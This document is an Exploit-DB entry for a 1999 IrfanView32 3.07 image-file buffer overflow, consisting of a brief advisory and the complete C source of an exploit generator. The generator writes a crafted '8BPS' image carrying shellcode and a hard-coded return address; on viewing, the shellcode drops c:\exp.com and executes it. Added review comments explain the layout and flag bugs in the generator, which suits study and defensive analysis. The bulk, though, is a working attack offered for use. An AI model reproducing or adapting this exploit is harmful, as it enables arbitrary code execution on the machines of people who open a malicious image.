IrfanView32 3.0.7 - Image File Buffer Overflow

EDB-ID:

19610


Author:

UNYUN

Type:

local


Platform:

Windows

Date:

1999-11-09


// source: https://www.securityfocus.com/bid/781/info

IrfanView32, a freeware image viewer, mishandles JPEG files generated by Adobe Photoshop. If a .jpg file whose header contains the Adobe Photoshop marker (8BPS) followed by a long string is opened for viewing, the string overflows a buffer and the program crashes. Code inserted in the string can then be executed, so the only action needed to trigger the flaw is opening the image.

/*=============================================================================
   Irfan View 3.07 Exploit
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  =============================================================================
*/

#include    <stdio.h>
#include    <string.h>
#include    <windows.h> 

/*
 * Layout constants for the image file that main() generates.
 * Offsets are relative to the start of the file buffer.
 */
#define     MAXBUF          0x22e0      // size of the file buffer and of the file written out
#define     RETADR          0x31E       // file offset where main() stores the 4 bytes of JMPESP_ADR
                                        // NOTE(review): the name suggests this is where the saved
                                        // return address lands in the viewer -- confirm
#define     FAKE_ADR        0x80101010  // Writable buffer pointer (stored at RETADR+8)

/*
 * Absolute address baked in for one specific OS build (see the author's
 * note below).  Reliance on a fixed address like this is what address-space
 * randomisation is meant to break.
 */
#define     JMPESP_ADR      0xbffca4f7  // You have to change this value
                                        // for non-Japanese Windows98.
// First 4 bytes of the generated file: the "8BPS" marker named in the advisory.
#define     HEAD            "8BPS\0"

/*
 * Machine-code stub that main() copies into the file at RETADR+12.
 *
 * main() patches it before use:
 *   - bytes 0x1f..0x22 receive the address of LoadLibrary,
 *   - the four offsets in GetProcAddress_fcp receive the address of
 *     GetProcAddress,
 *   - bytes 0x1c, 0x6d and 0x77 receive length values computed from the
 *     strings appended below.
 *
 * The final 0x00 terminates the array as a C string so main() can strcat()
 * string_buffer onto it; the array is declared with 300 bytes to leave room
 * for that appended text.
 */
unsigned char   exploit_code[300]={
 0xEB,0x4F,0x5F,0x32,0xC0,0x88,0x47,0x0A,0x88,0x47,0x10,0x88,0x47,0x17,0x88,0x47,
 0x1E,0x88,0x47,0x23,0x88,0x47,0x26,0x88,0x47,0x2D,0x88,0x47,0x3C,0x57,0xB8,0x50,
 0x77,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xDB,0xB3,0x0B,0x8B,0xC7,0x03,0xC3,0x50,
 0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x33,0xDB,0xB3,0x24,0x8B,0xC7,
 0x03,0xC3,0x50,0xB3,0x32,0x8B,0xC7,0x03,0xC3,0x50,0xFF,0xD1,0x89,0x47,0x2E,0xEB,
 0x02,0xEB,0x71,0x33,0xDB,0xB3,0x18,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,
 0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x8B,0x47,0x2E,0x50,0x33,0xC0,0xB0,0x03,0x90,0x90,
 0x50,0xB0,0x01,0x50,0x33,0xDB,0xB3,0x3D,0x03,0xDF,0x53,0xFF,0xD1,0x33,0xDB,0xB3,
 0x11,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0x5F,
 0x2E,0x53,0xFF,0xD0,0x33,0xDB,0xB3,0x27,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,
 0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0xB3,0x32,0x8B,0xCF,0x03,0xCB,0x51,0xFF,0xD0,
 0x33,0xDB,0x53,0xB3,0x1F,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,
 0xFF,0xD0,0xFF,0xD0,0xE8,0x39,0xFF,0xFF,0xFF,0x00
};

// "exp.com"
/*
 * Byte content associated with the dropped file (see `filename`).  main()
 * treats it as a NUL-terminated string: it is measured with strlen() and
 * appended to string_buffer, so the trailing 0x00 marks its end.
 * NOTE(review): the 0xcd,0x10 pairs look like 16-bit x86 INT 10h video BIOS
 * calls, i.e. a small DOS .COM demo -- confirm by disassembly.
 */
unsigned char   exploit_data[1000]={
0xb0,0x13,0xcd,0x10,0xb0,0x0f,0xfe,0xc0,0xb4,0x0c,0xcd,0x10,0x03,0xd1,0x41,0x3c,
0x20,0x77,0xf1,0xeb,0xf1,0x00
};

// Offsets inside exploit_code where main() writes the 4-byte address of
// GetProcAddress (one patch per entry).
int  GetProcAddress_fcp[4]={0x32,0x5e,0x88,0xbc};

// String table appended after exploit_code: a DLL name followed by C runtime
// function names and an fopen mode, joined with '_'.
// NOTE(review): presumably the stub replaces the '_' separators with NUL
// bytes at run time and uses "****" as 4 bytes of scratch space -- confirm.
char string_buffer[1000]  ="msvcrt.dll_fopen_fclose_fwrite_exit_wb_system_****";
// Path embedded in the string table.  Together with the fopen/fwrite/system
// names above, creation of this file is an observable indicator on a host
// where the crafted image was opened.
char filename[100]        = "c:\\exp.com";

/*
 * Builds a MAXBUF-byte file that starts with the "8BPS" marker and writes it
 * to the path given as argv[1].
 *
 * Returns FALSE (0) on success; calls exit(1) on a usage error or when the
 * output file cannot be opened.
 *
 * NOTE(review): main is declared without a return type (implicit int, not
 * valid since C99) and exit() is used without including <stdlib.h>.
 */
main(int argc,char *argv[])
{
    unsigned char   buf[MAXBUF],l1,l2;
    unsigned int    ip,p1,p2,i;
    FILE            *fp;
    
    if (argc<2){
        printf("usage : %s outputfile\n",argv[0]);
        exit(1);
    }
    // Fill the whole file image with 0x90 bytes.
    // NOTE(review): buf has MAXBUF elements, so buf[MAXBUF] is one past the
    // end -- this is an out-of-bounds write in the generator itself.
    memset(buf,0x90,MAXBUF); buf[MAXBUF]=0;
    // Overwrite the first 4 bytes with the "8BPS" marker.
    memcpy(buf,HEAD,4);
    
    // Store JMPESP_ADR at offset RETADR, least-significant byte first.
    ip=JMPESP_ADR;
    buf[RETADR  ]=ip&0xff;
    buf[RETADR+1]=(ip>>8)&0xff;
    buf[RETADR+2]=(ip>>16)&0xff;
    buf[RETADR+3]=(ip>>24)&0xff;
    // 0xEB 0x04 is the x86 encoding of a short jump of 4 bytes;
    // presumably it skips the FAKE_ADR dword stored next -- confirm.
    buf[RETADR+6]=0xeb;
    buf[RETADR+7]=0x04;

    // Store FAKE_ADR at RETADR+8, least-significant byte first.
    ip=FAKE_ADR;
    buf[RETADR+8]=ip&0xff;
    buf[RETADR+9]=(ip>>8)&0xff;
    buf[RETADR+10]=(ip>>16)&0xff;
    buf[RETADR+11]=(ip>>24)&0xff;
    
    // Take the addresses of LoadLibrary and GetProcAddress as seen by THIS
    // process and embed them in the stub.  The generated file is therefore
    // only meaningful where those functions sit at the same addresses.
    // NOTE(review): casting a function pointer to unsigned int truncates on
    // targets where pointers are wider than 32 bits.
    p1=(unsigned int)LoadLibrary;
    p2=(unsigned int)GetProcAddress;
    exploit_code[0x1f]=p1&0xff;
    exploit_code[0x20]=(p1>>8)&0xff;
    exploit_code[0x21]=(p1>>16)&0xff;
    exploit_code[0x22]=(p1>>24)&0xff;

    // Patch the GetProcAddress address at each offset listed in the table.
    for (i=0;i<4;i++){
        exploit_code[GetProcAddress_fcp[i]  ]=p2&0xff;
        exploit_code[GetProcAddress_fcp[i]+1]=(p2>>8)&0xff;
        exploit_code[GetProcAddress_fcp[i]+2]=(p2>>16)&0xff;
        exploit_code[GetProcAddress_fcp[i]+3]=(p2>>24)&0xff;
    }

    // Lengths are taken BEFORE the strcat calls below change string_buffer.
    // NOTE(review): l1 and l2 are unsigned char, so any length above 255
    // would wrap silently; strlen() is also being passed unsigned char
    // arrays here and further down.
    l1=strlen(filename)+strlen(string_buffer);
    l2=strlen(exploit_data);
    // Build "<string table><filename>_<exploit_data>" and append it to the
    // stub.  None of these strcat calls checks the destination size; the
    // code relies on the fixed array sizes (1000 and 300) being large enough.
    strcat(string_buffer,filename );
    strcat(string_buffer,"_" );
    strcat(string_buffer,exploit_data );
    strcat(exploit_code, string_buffer );
    // Patch the computed lengths into fixed offsets of the stub.
    exploit_code[0x1c]  = l1;
    exploit_code[0x6d]  = l2;
    exploit_code[0x77]  = l1+1;

    // Place the patched stub plus appended strings right after the 12 bytes
    // written at RETADR.  strlen() is used as the length, so the copy stops
    // at the first zero byte in exploit_code.
    memcpy(buf+RETADR+12,exploit_code,strlen(exploit_code));

    if ((fp=fopen(argv[1],"wb"))==NULL){
        printf("Can not write file '%s'\n",argv[1]);
        exit(1);
    }
    
    // NOTE(review): the fwrite and fclose results are not checked, so a
    // short write still prints "Done.".
    fwrite(buf,1,MAXBUF,fp);
    fclose(fp);
    printf("Done.\n");
    return FALSE;
}